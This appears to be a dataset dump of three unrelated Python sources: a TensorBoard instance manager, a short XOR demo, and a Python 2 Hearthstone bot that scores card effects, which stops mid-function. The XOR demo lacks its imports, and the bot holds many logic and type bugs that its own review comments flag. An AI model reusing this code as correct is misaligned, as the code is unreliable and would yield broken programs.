text stringlengths 8 6.05M |
|---|
# -*- coding: utf-8 -*-
import os
import sys
import threading
import time
import itertools
from collections import namedtuple
import logging
import six
sys.argv = ["tensorboard"]
from tensorboard.backend import application # noqa
try:
    # TensorBoard 0.4.x and above expose a `default` module; its presence
    # selects which create_tb_app() flavour is defined below.
    from tensorboard import default
    if not hasattr(application, "reload_multiplexer"):
        # Tensorflow 1.12 removed reload_multiplexer, patch it
        def reload_multiplexer(multiplexer, path_to_run):
            # Re-register every run directory, then reload the event data.
            for path, name in six.iteritems(path_to_run):
                multiplexer.AddRunsFromDirectory(path, name)
            multiplexer.Reload()
        application.reload_multiplexer = reload_multiplexer
    if hasattr(default, 'PLUGIN_LOADERS') or hasattr(default, '_PLUGINS'):
        # Tensorflow 1.10 or above series
        logging.debug("Tensorboard 1.10 or above series detected")
        from tensorboard import program
        def create_tb_app(logdir, reload_interval, purge_orphaned_data):
            # Build the WSGI app through the flag-driven TensorBoard API.
            argv = [
                "",
                "--logdir", logdir,
                "--reload_interval", str(reload_interval),
                "--purge_orphaned_data", str(purge_orphaned_data),
            ]
            tensorboard = program.TensorBoard()
            tensorboard.configure(argv)
            return application.standard_tensorboard_wsgi(
                tensorboard.flags,
                tensorboard.plugin_loaders,
                tensorboard.assets_zip_provider)
    else:
        logging.debug("Tensorboard 0.4.x series detected")
        def create_tb_app(logdir, reload_interval, purge_orphaned_data):
            # 0.4.x API accepts the settings as keyword arguments directly.
            return application.standard_tensorboard_wsgi(
                logdir=logdir, reload_interval=reload_interval,
                purge_orphaned_data=purge_orphaned_data,
                plugins=default.get_plugins())
except ImportError:
    # Tensorboard 0.3.x series
    from tensorboard.plugins.audio import audio_plugin
    from tensorboard.plugins.core import core_plugin
    from tensorboard.plugins.distribution import distributions_plugin
    from tensorboard.plugins.graph import graphs_plugin
    from tensorboard.plugins.histogram import histograms_plugin
    from tensorboard.plugins.image import images_plugin
    from tensorboard.plugins.profile import profile_plugin
    from tensorboard.plugins.projector import projector_plugin
    from tensorboard.plugins.scalar import scalars_plugin
    from tensorboard.plugins.text import text_plugin
    logging.debug("Tensorboard 0.3.x series detected")
    # Explicit plugin list; 0.3.x has no default.get_plugins().
    _plugins = [
        core_plugin.CorePlugin,
        scalars_plugin.ScalarsPlugin,
        images_plugin.ImagesPlugin,
        audio_plugin.AudioPlugin,
        graphs_plugin.GraphsPlugin,
        distributions_plugin.DistributionsPlugin,
        histograms_plugin.HistogramsPlugin,
        projector_plugin.ProjectorPlugin,
        text_plugin.TextPlugin,
        profile_plugin.ProfilePlugin,
    ]
    def create_tb_app(logdir, reload_interval, purge_orphaned_data):
        # 0.3.x API: pass the plugin list explicitly.
        return application.standard_tensorboard_wsgi(
            logdir=logdir, reload_interval=reload_interval,
            purge_orphaned_data=purge_orphaned_data,
            plugins=_plugins)
from .handlers import notebook_dir # noqa
# Record of one running TensorBoard: display name, served logdir, the WSGI
# app object, and the background reload thread (None when reload is off).
TensorBoardInstance = namedtuple(
    'TensorBoardInstance', ['name', 'logdir', 'tb_app', 'thread'])
def start_reloading_multiplexer(multiplexer, path_to_run, reload_interval):
    """Start a daemon thread that reloads *multiplexer* forever.

    The thread re-scans ``path_to_run`` every ``reload_interval`` seconds
    and exposes two attributes used elsewhere in this module:

    * ``thread.reload_time`` -- timestamp of the last completed reload.
    * ``thread.stop`` -- set to True (see ``TensorboardManger.terminate``)
      to make the loop exit after the current iteration.

    Returns the started ``threading.Thread``.
    """
    def _reload_forever():
        # current_thread() replaces the camelCase alias currentThread(),
        # which was deprecated in 3.10 and removed in Python 3.12.
        current_thread = threading.current_thread()
        while not current_thread.stop:
            application.reload_multiplexer(multiplexer, path_to_run)
            current_thread.reload_time = time.time()
            time.sleep(reload_interval)

    thread = threading.Thread(target=_reload_forever)
    thread.reload_time = None
    thread.stop = False
    # Daemon thread: never blocks interpreter shutdown.
    thread.daemon = True
    thread.start()
    return thread
def TensorBoardWSGIApp(logdir, plugins, multiplexer,
                       reload_interval, path_prefix="", reload_task="auto"):
    # Replacement for application.TensorBoardWSGIApp that registers every
    # newly built app with the module-level manager so it can be listed
    # and terminated later.
    path_to_run = application.parse_event_files_spec(logdir)
    if reload_interval:
        # Reload in the background so request handling stays responsive.
        thread = start_reloading_multiplexer(
            multiplexer, path_to_run, reload_interval)
    else:
        # Single synchronous load; no background thread to manage.
        application.reload_multiplexer(multiplexer, path_to_run)
        thread = None
    tb_app = application.TensorBoardWSGI(plugins)
    manager.add_instance(logdir, tb_app, thread)
    return tb_app
# Monkey-patch so create_tb_app() routes through the registering wrapper.
application.TensorBoardWSGIApp = TensorBoardWSGIApp
class TensorboardManger(dict):
    """Registry of running TensorBoard instances, keyed by instance name.

    Also keeps a secondary index from logdir to instance so that asking
    for the same logdir twice reuses the running instance.
    """

    def __init__(self):
        # logdir -> TensorBoardInstance secondary index.
        self._logdir_dict = {}

    def _next_available_name(self):
        """Return the smallest positive integer (as a string) not in use."""
        for number in itertools.count(start=1):
            candidate = "%d" % number
            if candidate not in self:
                return candidate

    def new_instance(self, logdir, reload_interval):
        """Return the instance serving *logdir*, creating one if needed."""
        if not os.path.isabs(logdir) and notebook_dir:
            logdir = os.path.join(notebook_dir, logdir)
        if logdir not in self._logdir_dict:
            # create_tb_app() registers the instance indirectly through the
            # patched application.TensorBoardWSGIApp -> add_instance().
            create_tb_app(
                logdir=logdir,
                reload_interval=reload_interval or 30,
                purge_orphaned_data=True)
        return self._logdir_dict[logdir]

    def add_instance(self, logdir, tb_application, thread):
        """Register a freshly created TensorBoard app under a new name."""
        name = self._next_available_name()
        instance = TensorBoardInstance(name, logdir, tb_application, thread)
        self[name] = instance
        self._logdir_dict[logdir] = instance

    def terminate(self, name, force=True):
        """Stop the named instance's reload thread and forget it."""
        if name not in self:
            raise Exception("There's no tensorboard instance named %s" % name)
        instance = self[name]
        if instance.thread is not None:
            # Cooperative stop; the reload loop checks this flag.
            instance.thread.stop = True
        del self[name]
        del self._logdir_dict[instance.logdir]
manager = TensorboardManger()
|
def xor_sum(a, b):
    """Print and return the XOR-fold of all pairwise sums of *a* and *b*.

    Computes i + j for every i in a and j in b, then XORs all the sums
    together.  Returns None (and prints None) when either list is empty;
    the original indexed result[0] unconditionally and raised IndexError
    in that case.
    """
    pair_sums = [i + j for i in a for j in b]
    total_sum = functools.reduce(operator.xor, pair_sums) if pair_sums else None
    print(total_sum)
    return total_sum
# Demo run plus a quick tour of Python's bitwise operators (x=2, y=3).
xor_sum([4, 6, 0, 0, 3, 3], [0, 5, 6, 5, 0, 3])
x = 2
y = 3
print(x & y)   # AND         -> 2
print(x | y)   # OR          -> 3
print(x ^ y)   # XOR         -> 1
print(~x)      # NOT         -> -3
print(y << 1)  # left shift  -> 6
print(x >> 1)  # right shift -> 1
|
from tables import Enum
from Util_new import Cardtype, split, Zone, Option, ThreatClasses
from Board import getEnemyCards, getMyCards,getCardByIngameId, isMyCard,\
getMyHandcardCount, getEnemyHandcardCount, getMyHero, getMyMana
# Maps the engine's numeric race/type ids to keywords found in card text.
raceDict = {1: 'minion', 2: 'beast', 3: 'mech', 4: 'dragon', 5: 'pirate', 6: 'demon', 7: 'murloc', 8: 'character', 9: 'hero', 10: 'weapon'}
def getRaceDict():
    # Accessor for the module-level race mapping.
    global raceDict
    return raceDict
class Side(Enum):
    # Which player a card/effect belongs to.
    MY = 0
    ENEMY = 1
    BOTH = 2
class Effect(Enum):
    # Keywords scanned for in card rules text to classify an effect.
    # NOTE(review): the scoring functions test "Effect.X in text" on plain
    # strings; verify that this tables.Enum yields substring-comparable
    # members.
    DAMAGE = 'damage'
    RESTORE = 'restore'
    RETURN = 'return'
    DESTROY = 'destroy'
    GAIN = 'gain'
    TRANSFORM = 'transform'
    ADD = 'add'
    EQUIP = 'equip'
    DRAW = 'draw'
    DISCARD = 'discard'
    AURA = 'aura'
    GIVE = 'give'
    OVERLOAD = 'overload'
    HAVE = 'have +'
def findTargetsInText(card, text):
    # Parse a card's rules text and return the list of in-play cards it
    # affects, or None when no target group is mentioned.
    try:
        _race = None
        # Remember the last race keyword mentioned in the text, if any.
        for race in getRaceDict().values():
            if race in text:
                _race = race
        if 'enemies' in text or 'enemy' in text:
            cards = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
        elif 'friendly' in text or 'your' in text:
            if 'other' in text:
                cards = [c for c in getMyCards().values() if c.compareZone(Zone.PLAY) and not c._ingameID == card._ingameID]
            else:
                cards = [c for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
        else:
            if 'other' in text:
                # NOTE(review): the two statements below were probably meant
                # to be ONE concatenated list; as written the second line is
                # a stand-alone unary "+" on a list (TypeError at runtime,
                # swallowed by the except), and getMyCards() is missing
                # .values().  TODO: join with parentheses and fix.
                cards = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
                + [c for c in getMyCards() if c.compareZone(Zone.PLAY) and not c._ingameID == card._ingameID]
            elif 'all' in text:
                # NOTE(review): same stray unary "+" problem as above.
                cards = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
                + [c for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
            else:
                cards = None
        if _race is not None and cards is not None:
            if _race == 'character':
                pass
            elif _race == 'hero':
                # NOTE(review): the filters below test "card" (the spell)
                # instead of the loop variable "c", and "cards._race" should
                # be "c._race" — the race filter never works as intended.
                cards = [c for c in cards if card.compareCardtype(Cardtype.HERO)]
            else:
                if _race == 'minion':
                    cards = [c for c in cards if card.compareCardtype(Cardtype.MINION)]
                else:
                    cards = [c for c in cards if card.compareCardtype(Cardtype.MINION) and cards._race == _race]
        return cards
    except Exception, e:
        print 'findTargetsInText()', e
def damageEffect(target, text, cost):
    # Score a "deal X damage" effect against one target; more negative is
    # better for us.  Returns None when 'deal' is absent or parsing fails.
    try:
        if 'deal' in text:
            amount = split(text, 'deal', 'damage')
            if '-' in amount:
                # "deal 2-3 damage" -> use the average.
                a1, a2 = amount.split('-')
                amount = ((int(a1) + int(a2))/2.0)
            elif amount == '':
                # NOTE(review): amount stays '' here, so the comparisons
                # below silently compare str with int (legal in Python 2).
                pass
            else:
                amount = int(amount)
            if isMyCard(target._ingameID):
                # Hitting our own card: positive (bad), worse when lethal.
                value = amount
                if target.getHealth() <= amount and not target._divineShield:
                    value = value + (target._manacosts/2.0)
            else:
                value = (-1 * amount)
                if target.compareCardtype(Cardtype.MINION):
                    if not target._divineShield:
                        if target.getHealth() < amount:
                            value = value - (round(target._manacosts/2.0, 0))
                        elif target.getHealth() == amount:
                            # Exact lethal damage is rewarded double.
                            value = (value - (round(target._manacosts/2.0, 0))) * 2
                if target.compareCardtype(Cardtype.HERO):
                    if target.getHealth() <= amount:
                        # Lethal on the enemy hero: huge bonus.
                        value = value - (round(target._manacosts/2.0, 0)) - 10
            return value
    except Exception, e:
        print 'damageEffect()', e
def restoreEffect(target, text, cost):
    # Score a healing effect; negative is good when healing our own card.
    try:
        if 'restore' in text:
            if 'full health' in text:
                amount = target.getDamage()
            else:
                # NOTE(review): split() returns a string and is never passed
                # through int(), so "-1*amount" below is Python 2 string
                # repetition (yields ''), not arithmetic — TODO fix.
                amount = split(text, 'restore', 'health')
            value = (-1*amount)
            if isMyCard(target._ingameID) and target.getDamage() <= amount:
                # Overhealing our card wastes the effect.
                value = value - (target._manacosts/2.0)
            elif not isMyCard(target._ingameID) and target.getDamage() <= amount:
                value = value + (target._manacosts/2.0)
            return value
    except Exception, e:
        print 'restoreEffect()', e
def transformEffect(target, text, cost):
    # Score "transform ... into a X/Y" by comparing the target's current
    # stats with the stats it would be turned into.
    try:
        if 'transform' in text:
            # NOTE(review): for "into a X/Y" text the number before '/' is
            # conventionally attack, so the local names health/atk look
            # swapped — verify against real card texts.
            health, atk = text.split('/')
            health = int(health.split('into a ')[1])
            atk = int(atk.split(' ')[0])
            if isMyCard(target._ingameID) and target.getHealth() < health and target.getAttack() < atk:
                return (-1 * target._manacosts)
            elif not isMyCard(target._ingameID) and target.getHealth() > health and target.getAttack() > atk:
                return (-1 * target._manacosts)
            else:
                return 0
    except Exception, e:
        print 'transformEffect()', e
def giveEffect(target, text, cost, threatClass):
    # Score buff effects ("give +X/+Y" plus keywords); negative is good
    # when the buff lands on our own card, mirrored otherwise.
    try:
        if 'give' in text or 'have +' in text:
            atk = 0
            hlt = 0
            if 'attack' in text and not 'health' in text:
                atk = int(split(text, '+', ' '))
            elif 'health' in text and not 'attack' in text:
                hlt = int(split(text, '+', ' '))
            else:
                # "+X/+Y" style buff.
                atk = int(split(text, '+', '/'))
                hlt = int(split(text, '+', ' '))
            # NOTE(review): precedence — this is (-atk/2) + hlt/2; probably
            # meant -(atk/2 + hlt/2).  TODO confirm intent.
            value = (-1 * (atk/2.0) + (hlt/2.0))
            if 'charge' in text:
                value = value - 1
            if 'taunt' in text:
                value = value - 1
                # Taunt is worth more while we are under threat.
                # NOTE(review): nesting inferred — source indentation lost.
                if threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
                    value = value - (threatClass - 1)
            if 'windfury' in text:
                value = value - 2
            if 'divine shield' in text:
                value = value - 1
            if 'stealth' in text:
                value = value - 1
            if 'end of turn' in text:
                # Temporary buffs are worth less.
                value = value + 1
            if isMyCard(target._ingameID):
                return value
            else:
                return (-1 * value)
    except Exception, e:
        print 'giveEffect()', e
def destroyEffect(target, text, cost):
    # Destroying our own card costs us its mana value (positive, bad);
    # destroying an enemy card gains it (negative, good).
    try:
        if isMyCard(target._ingameID):
            return target._manacosts
        else:
            return (-1 * target._manacosts)
    except Exception, e:
        print 'destroyEffect()', e
def returnEffect(target, text, cost):
    # Placeholder: "return to hand" effects are not scored yet.
    # NOTE(review): always returns None, which breaks callers that add the
    # result to a number (the TypeError is swallowed there).
    try:
        if isMyCard(target._ingameID):
            pass
        else:
            pass
    except Exception, e:
        print 'returnEffect()', e
def drawEffect(text, cost):
    # Score card-draw effects: -2 per card drawn, adjusted when a draw
    # would overflow the 10-card hand limit (burned cards).
    try:
        amount = split(text, 'draw ', ' card')
        try:
            amount = int(amount)
        except:
            if amount == 'a':
                amount = 1
            elif amount == 'two':
                amount = 2
            # NOTE(review): any other word ('three', ...) leaves amount a
            # string and breaks the arithmetic below (swallowed).
        value = (-2 * amount)
        if 'each player draw' in text:
            # Enemy overdraw helps us; our overdraw hurts.
            if getEnemyHandcardCount() + amount > 10:
                value = value - 1
            else:
                value = value + 1
            if getMyHandcardCount() + amount > 10:
                value = value + 1
        elif 'your opponent draw' in text:
            if getEnemyHandcardCount() + amount > 10:
                value = value - 1
            else:
                value = value + 1
        else:
            if getMyHandcardCount() + amount > 10:
                value = value + 1
        return value
    except Exception, e:
        print 'drawEffect()', e
def gainEffect(text, cost):
    # Score resource-gain effects: mana crystals, armor and stat gains.
    try:
        if 'mana crystal' in text:
            try:
                mana = int(split(text, 'gain ', ' mana'))
            except:
                if 'an' in text:
                    mana = 1
                # NOTE(review): if neither parse works, "mana" stays
                # undefined and the code below raises (swallowed).
            if 'this turn only' in text:
                # Temporary mana only helps if it unlocks a minion we could
                # not otherwise afford this turn.
                hand = [c for c in getMyCards().values() if c.compareZone(Zone.HAND) and c.compareCardtype(Cardtype.MINION)]
                resources = getMyMana()
                cardWithHigherCosts = False
                for c in hand:
                    if c._manacosts == resources + mana:
                        cardWithHigherCosts = True
                        print c._name
                        break
                if cardWithHigherCosts:
                    mana = (mana/2.0)
                else:
                    mana = -1
            return (-1 * mana)
        elif 'armor' in text:
            # NOTE(review): split() result is a string; the missing int()
            # makes "-1 * armor" string repetition in Python 2 — TODO fix.
            armor = split(text, 'gain ', ' armor')
            return (-1 * armor)
        elif 'health' in text:
            hlt = int(split(text, '+', 'attack'))
            return (-1 * (hlt/2))
        elif 'attack' in text:
            atk = int(split(text, '+', 'attack'))
            return (-1 * (atk/2))
        elif '+' in text and '/' in text:
            # "+X/+Y" stat gain.
            atk = int(split(text, '+', '/'))
            hlt = int(text.split('/+')[1][:1])
            return (-1 * ((atk + hlt)/2.0))
    except Exception, e:
        print 'gainEffect()', e
def discardEffect(text, cost):
    # Placeholder: discard effects are not scored yet.
    # NOTE(review): returns None, which breaks callers that add the result
    # to a number (the TypeError is swallowed there).
    try:
        pass
    except Exception, e:
        print 'discardEffect()', e
def addEffect(text, cost):
    # Score "add ... to your hand" effects; only spare parts are valued.
    # Returns None for anything else.
    try:
        if 'spare part' in text:
            return -1
    except Exception, e:
        print 'addEffect()', e
def equipEffect(text, cost):
    # Score weapon-equip effects by the average of attack and durability.
    try:
        if 'equip' in text:
            # NOTE(review): 'equip a ' '/' is implicit string concatenation,
            # so split() receives two arguments instead of three and raises
            # (swallowed).  TODO: split(text, 'equip a ', '/').
            atk = int(split(text, 'equip a ' '/'))
            hlt = int(split(text, '/', ''))
            return (-1 * ((atk + hlt)/2.0))
    except Exception, e:
        print 'equipEffect()', e
def summonEffect(text, cost):
    # Score "summon N X/Y" effects by N times the average of the stats.
    try:
        if 'summon' in text:
            amount = split(text, 'summon', '/')
            amount, atk = amount.split(' ')
            # NOTE(review): split('/', ' ') is missing the text argument and
            # raises (swallowed); the durability/health is never parsed.
            hlt = int(split('/', ' '))
            atk = int(atk)
            if amount == 'a':
                amount = 1
            elif amount == 'two':
                amount = 2
            elif amount == 'three':
                amount = 3
            elif amount == 'five':
                amount = 5
            return (-1 * (amount * ((atk + hlt)/2.0)))
    except Exception, e:
        print 'summonEffect()', e
def costEffect(text, cost):
    # Score cost-modification effects ("cost (2) less/more").
    # NOTE(review): in this module negative is good, yet "less" returns a
    # positive amount and "more" a negative one — verify the sign.
    try:
        if 'cost' in text:
            amount = int(split(text, '(', ')'))
            if 'less' in text:
                return amount
            elif 'more' in text:
                return (amount * -1)
    except Exception, e:
        print 'costEffect()', e
def overloadEffect(text, cost):
    # Overload delays mana: penalty is half the overload amount on top of
    # the card's cost.
    # NOTE(review): callers add this to a value that already includes the
    # cost, so the cost is counted twice — verify.
    try:
        amount = split(text, 'overload:', ')')
        amount = int(amount.split('(')[1])
        return cost + round(amount/2.0,0)
    except Exception, e:
        print 'overloadEffect()', e
def attackEffectivness(attacker, target, threatClass):
    # Score one attack (attacker -> target); more negative is better.
    # Attacks into our own cards score a flat 3 (discouraged).
    try:
        value = 0
        # Survival margins after the trade.
        atk = attacker.getHealth() - target.getAttack()
        tar = target.getHealth() - attacker.getAttack()
        if not isMyCard(target._ingameID):
            if not target.compareCardtype(Cardtype.HERO):
                if target._divineShield:
                    # Popping a shield is best done with a cheap/1-attack hit.
                    if attacker._divineShield:
                        value = -2
                    elif attacker.getAttack() == 1:
                        if atk > 0:
                            value = -2
                        else:
                            value = -1
                    elif attacker.getAttack() > 1:
                        if atk > 0:
                            value = -1
                        else:
                            value = 0
                elif attacker._divineShield:
                    if tar <= 0:
                        # Free kill: our shield absorbs the counter-hit.
                        value = (target._manacosts *-1) - 1
                    else:
                        value = 0
                elif target.getHealth() == attacker.getAttack():
                    # Exact lethal slightly preferred over overkill.
                    value = (target._manacosts *-1) - 0.5
                elif target.getHealth() < attacker.getAttack():
                    value = target._manacosts * -1
                else:
                    value = 0
            if atk > 0:
                if atk == attacker.getHealth():
                    # Attacker takes no damage at all.
                    value = value - 1
                else:
                    value = value + 1
            if tar > 0 and not target.compareCardtype(Cardtype.HERO):
                value = value + 1
            elif tar <= 0 and target.compareCardtype(Cardtype.HERO):
                # Lethal on the enemy hero.
                value = value - 10
            if threatClass == ThreatClasses.DEFENSE or threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
                value = value - threatClass
            return value
        else:
            return 3
    except Exception, e:
        print 'attackEffectiness()', e
def abilityWithoutTarget(text, cost):
    # Score a card text that needs no explicit target by summing all
    # recognised effect contributions on top of the card's cost.
    try:
        value = cost
        if Effect.GAIN in text:
            value = value + gainEffect(text, cost)
        if Effect.ADD in text:
            # NOTE(review): calls gainEffect, not addEffect — verify.
            value = value + gainEffect(text, cost)
        if Effect.DRAW in text:
            value = value + drawEffect(text, cost)
        if Effect.EQUIP in text:
            value = value + equipEffect(text, cost)
        if Effect.DISCARD in text:
            # NOTE(review): discardEffect returns None -> TypeError here
            # (swallowed), so such cards score as None.
            value = value + discardEffect(text, cost)
        if Effect.OVERLOAD in text:
            value = value + overloadEffect(text, cost)
        return value
    except Exception, e:
        print 'abilityWithoutTarget()', e
def abilityOnSingleTarget(target, text, cost, threatClass):
    # Sum every recognised effect contribution for one target on top of
    # the card's cost; lower (more negative) is better.
    try:
        value = cost
        if Effect.DAMAGE in text:
            value = value + damageEffect(target, text, cost)
        if Effect.RESTORE in text:
            value = value + restoreEffect(target, text, cost)
        if Effect.TRANSFORM in text:
            value = value + transformEffect(target, text, cost)
        if Effect.GIVE in text or Effect.HAVE in text:
            value = value + giveEffect(target, text, cost, threatClass)
        if Effect.DESTROY in text:
            value = value + destroyEffect(target, text, cost)
        if Effect.RETURN in text:
            # NOTE(review): returnEffect() always returns None, so this
            # branch raises a TypeError that the except below swallows.
            value = value + returnEffect(target, text, cost)
        if Effect.GAIN in text:
            value = value + gainEffect(text, cost)
        if Effect.ADD in text:
            # NOTE(review): calls gainEffect, not addEffect — verify.
            value = value + gainEffect(text, cost)
        if Effect.DRAW in text:
            value = value + drawEffect(text, cost)
        if Effect.EQUIP in text:
            value = value + equipEffect(text, cost)
        if Effect.DISCARD in text:
            value = value + discardEffect(text, cost)
        if Effect.OVERLOAD in text:
            value = value + overloadEffect(text, cost)
        return value
    except Exception, e:
        print 'abilityOnSingleTarget()', e
def abilityOnGroupOfTargets(text, cost, targets):
    # Total effectiveness of applying the ability to every target in the
    # group; per-target scores come from abilityOnSingleTarget with no
    # threat adjustment.
    return sum(abilityOnSingleTarget(member, text, cost, ThreatClasses.NONE)
               for member in targets)
def abilityEffectivness(card, text, cost, targets, threatClass):
    # Combine ability scores for a card, its text, and its target(s);
    # lower (more negative) is better.
    try:
        if targets is None and card._text is not None:
            # No explicit target chosen: infer the affected group.
            targets = findTargetsInText(card, text)
            if targets is None:
                effectivness = abilityWithoutTarget(text, cost)
            else:
                effectivness = abilityOnGroupOfTargets(text, cost, targets)
        else:
            effectivness = abilityOnSingleTarget(targets, text, cost, threatClass)
        if targets is None and 'random' in text:
            # NOTE(review): len(targets) with targets None raises a
            # TypeError (swallowed); the condition probably meant
            # "targets is not None".
            effectivness = (effectivness / len(targets))
        if card.compareCardtype(Cardtype.MINION):
            # Keyword bonuses for the minion body itself.
            if card._taunt:
                effectivness = effectivness - 1
                if threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
                    effectivness = effectivness - (threatClass - 1)
            if card._windfury:
                effectivness = effectivness - (card._attack/2.0)
            if card._charge:
                effectivness = effectivness - 1
                if threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
                    effectivness = effectivness - (threatClass / 2.0)
            if card._divineShield:
                effectivness = effectivness - 1
        return effectivness
    except Exception, e:
        print 'abilityEffectivness()', e
def nonMinionEffectivness(card, target):
    # Spells/weapons: value is purely the ability score at full mana cost.
    return abilityEffectivness(card, card._text, card._manacosts, target, ThreatClasses.NONE)
def minionEffectivness(card, targets, threatClass):
    # Minion value: cost minus average stats, plus ability score, plus a
    # penalty when the minion's attack exceeds the enemy board's total
    # damage (overkill on an empty board is wasted tempo).
    mana = card._manacosts
    mana = mana - ((card._attack + card._health)/2.0)
    if card._text is not None:
        mana = abilityEffectivness(card, card._text, mana, targets, threatClass) #abilityEffectivness returns negative values for effective cards
    enemyDmg = [c.getAttack() for c in getEnemyCards().values() if c.compareZone(Zone.PLAY) and c.compareCardtype(Cardtype.MINION)]
    dmg = 0
    for d in enemyDmg:
        dmg = dmg + d
    if card._attack > dmg:
        mana = mana - (card._attack - dmg)
    return mana
def playEffectivness(card, target, threatClass):
    # Dispatch to the minion or non-minion scorer.
    if card.compareCardtype(Cardtype.MINION):
        return minionEffectivness(card, target, threatClass)
    else:
        return nonMinionEffectivness(card, target)
def effectivness(option, threatClass):
    # Evaluate one (cardId, optionType, targetIds) option; lower score is
    # better.  Returns (Option.X, (score, card, target)).
    try:
        bestAttack = None
        bestPlay = None
        card = getCardByIngameId(option[0])
        if option[2] is not None:
            targets = [getCardByIngameId(Id) for Id in option[2]]
        else:
            targets = None
        if option[1] == Option.ATTACK:
            # NOTE(review): targets may be None here, raising in the loop
            # (swallowed) — attack options with no targets return None.
            for t in targets:
                eff = attackEffectivness(card, t, threatClass)
                if bestAttack is None or eff < bestAttack[0]:
                    bestAttack = (eff, card, t)
        elif option[1] == Option.PLAY:
            if targets is None:
                bestPlay = (playEffectivness(card, None, threatClass), card, None)
            else:
                for t in targets:
                    eff = playEffectivness(card, t, threatClass)
                    if bestPlay is None or eff < bestPlay[0]:
                        bestPlay = (eff, card, t)
        if bestAttack is None:
            return (Option.PLAY, bestPlay)
        else:
            return (Option.ATTACK, bestAttack)
    except Exception, e:
        print 'effectivness()', e
def enemyHasDefense(targets):
    # Return (hasDefense, [defensive cards]).  Taunt minions, the
    # hard-coded card id 'GVG_021', and anything with 6+ attack count as
    # defense that should be removed first.
    try:
        defense = [t for t in targets if (t.compareCardtype(Cardtype.MINION) and t._taunt) or t._id == 'GVG_021' or t.getAttack() >= 6]
        return (len(defense) > 0, defense)
    except Exception, e:
        print 'enemyHasDefense()', e
def enemyHasThreat(targets):
    # Return (hasThreat, [threats]).  Enemy minions with effective attack
    # above 3 (windfury doubled) become threats once their combined damage
    # is lethal to our hero or exceeds our own board damage.
    try:
        threat = []
        potentialDmg = 0
        myDamage = [c.getAttack() for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
        Damage = 0
        for d in myDamage:
            Damage = Damage + d
        for t in targets:
            potentialDmg = potentialDmg + t.getAttack()
        if potentialDmg >= getMyHero().getHealth() or Damage < potentialDmg:
            for t in targets:
                atk = t.getAttack()
                if t.compareCardtype(Cardtype.MINION):
                    if t._windfury:
                        atk = atk * 2
                if atk > 3:
                    threat.append(t)
        if len(threat) > 0:
            return (True, threat)
        return (False, threat)
    except Exception, e:
        print 'enemyHasThreat()', e
def sortAfterStrength(minions):
    # Insertion sort of minions by attack, strongest first.
    try:
        retVal = []
        for m in minions:
            if retVal == []:
                retVal.append(m)
                continue
            i = 0
            # Find the first slot whose occupant is weaker and insert there.
            while i < len(retVal):
                if m.getAttack() > retVal[i].getAttack():
                    retVal.insert(i, m)
                    break
                i = i + 1
            if m not in retVal:
                # Weaker than everything seen so far: goes to the end.
                retVal.append(m)
        return retVal
    except Exception, e:
        print 'sortAfterStrength()', e
def isMyDefenseStrong(minions,targets):
    # True when our taunts can absorb the enemy board's (plus weapon's)
    # potential damage, or when we have at least one taunt per attacker.
    try:
        potentialDmg = 0
        for t in targets:
            potentialDmg = potentialDmg + t.getAttack()
        weaponAtk = [c for c in getEnemyCards().values() if c.compareZone(Zone.WEAPON)]
        if not weaponAtk == []:
            potentialDmg = potentialDmg + weaponAtk[0].getAttack()
            # NOTE(review): mutates the caller's targets list in place.
            targets.append(weaponAtk[0])
        defense = 0
        taunts = []
        for m in minions:
            if m._taunt:
                defense = defense + m.getHealth()
                taunts.append(m)
        if defense >= potentialDmg:
            return True
        elif len(taunts) >= len(targets):
            return True
        else:
            # Check if removing the single strongest attacker would bring
            # the remaining damage under our taunt health.
            targets = sortAfterStrength(targets)
            for t in targets:
                potentialDmgAfterReduction = potentialDmg - t.getAttack()
                if potentialDmgAfterReduction > defense:
                    return False
            # NOTE(review): falls through to an implicit None when the loop
            # never exceeds defense — probably meant to return True.
    except Exception, e:
        print 'isMyDefenseStrong()', e
def options(options):
    # Pick the best option from the engine's option list.  options[0] is
    # treated as the default/end-turn option and is returned when nothing
    # scores as worth doing.
    # NOTE(review): the parameter shadows the function's own name.
    try:
        if len(options) > 1:
            enemyTargets = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
            myBoard = [c for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
            defense = enemyHasDefense(enemyTargets)
            threat = enemyHasThreat(enemyTargets)
            threatClass = ThreatClasses.NONE
            if defense[0]:
                if threat[0]:
                    threatClass = ThreatClasses.DEFENSE_THREAT
                else:
                    threatClass = ThreatClasses.DEFENSE
                # Restrict every option's targets to defense/threat cards.
                for index,option in enumerate(options):
                    if option[2] is None:
                        continue
                    else:
                        new_opt_id = []
                        for Id in option[2]:
                            card = getCardByIngameId(Id)
                            if threat[0]:
                                if card in defense[1] or card in threat[1]:
                                    new_opt_id.append(Id)
                            else:
                                if card in defense[1]:
                                    new_opt_id.append(Id)
                        options[index] = (option[0], option[1], new_opt_id)
            elif threat[0]:
                threatClass = ThreatClasses.THREAT
                # NOTE(review): enumerate() without tuple unpacking —
                # "option" is an (index, option) pair here, so option[2]
                # misbehaves and "index" leaks from the loop above.
                for option in enumerate(options):
                    if option[2] is None:
                        continue
                    else:
                        new_opt_id = []
                        for Id in option[2]:
                            if getCardByIngameId(Id) in threat[1]:
                                new_opt_id.append(Id)
                        options[index] = (option[0], option[1], new_opt_id)
            if isMyDefenseStrong(myBoard, enemyTargets):
                threatClass = ThreatClasses.STRONG_DEFENSE
                # With a strong defense, avoid suicidal/friendly targets.
                for index, option in enumerate(options):
                    if option[2] is None:
                        continue
                    elif option[1] == Option.ATTACK and getCardByIngameId(option[0])._taunt:
                        new_opt_id = []
                        for Id in option[2]:
                            if not isMyCard(Id) and not getCardByIngameId(Id).compareCardtype(Cardtype.HERO):
                                new_opt_id.append(Id)
                        options[index] = (option[0], option[1], new_opt_id)
                    else:
                        new_opt_id = []
                        for Id in option[2]:
                            if not isMyCard(Id) and getCardByIngameId(Id) not in threat[1]:
                                new_opt_id.append(Id)
